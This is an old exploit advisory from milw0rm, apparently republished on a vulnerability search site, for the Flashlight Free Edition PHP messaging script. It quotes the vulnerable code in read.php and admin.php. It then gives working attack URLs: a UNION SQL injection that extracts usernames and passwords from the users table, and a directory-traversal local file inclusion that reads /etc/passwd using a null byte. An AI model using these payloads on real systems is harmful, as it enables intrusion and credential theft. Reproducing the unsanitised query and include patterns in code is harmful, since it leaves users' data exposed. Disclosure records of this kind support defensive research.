Recent Vulnerabilities Research Posts Trends Blog About Contact

Related Vulnerabilities: CVE-2009-4205 CVE-2009-4204

Publish Date: 02 Jun 2009

Author: K4m1k451

                XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
Flashlight Free Edition - (LFI/SQL) Multiple Remote Vul
XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX

RATM: "All hell can't stop us now!"

XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
--[Author : k4m1k451

--[E-mail : k4m1k451@gmail.com
XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX

XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
--[Script   : Flashlight

--[Download : http://scripts.ringsworld.com/communication-tools/flashlight-free-edition.zip
XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX

--[Remote SQLi

--[File     : read.php


--[Vul      :
$id = $_GET['id'];
$sql = mysql_query("SELECT * FROM inbox WHERE msg_id='$id' AND msg_to='$user_id'");

--[Exploit  :
http://localhost/flash/read.php?id=1'+UNION+ALL+SELECT+1,2,3,4,5,concat(username,0x20,password),version(),user(),9+from+users--+
XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX

--[Local File Inclusion

--[File     : admin.php
--[Vul      :

$inc = $_GET['action'];
include ("admin/".$inc.".php");

--[Exploit  :
http://localhost/flash/admin.php?action=../../../../../../../../etc/passwd%00

XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX

Gr3etz: c0d3_z3r0, 0ut0fBound, str0ke

XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX

# milw0rm.com [2009-06-02]

Vulmon Search is a vulnerability search engine. It gives comprehensive vulnerability information through a very simple user interface.

Home Recent Vulnerabilities Research Posts Trends Blog About Contact

Vulmon Search Vulmon Research Vulmon Alerts Vulmap

Twitter Reddit Linkedin Facebook

flashlight free edition - Local File Inclusion / SQL Injection

Vulmon Search

About

Products

Connect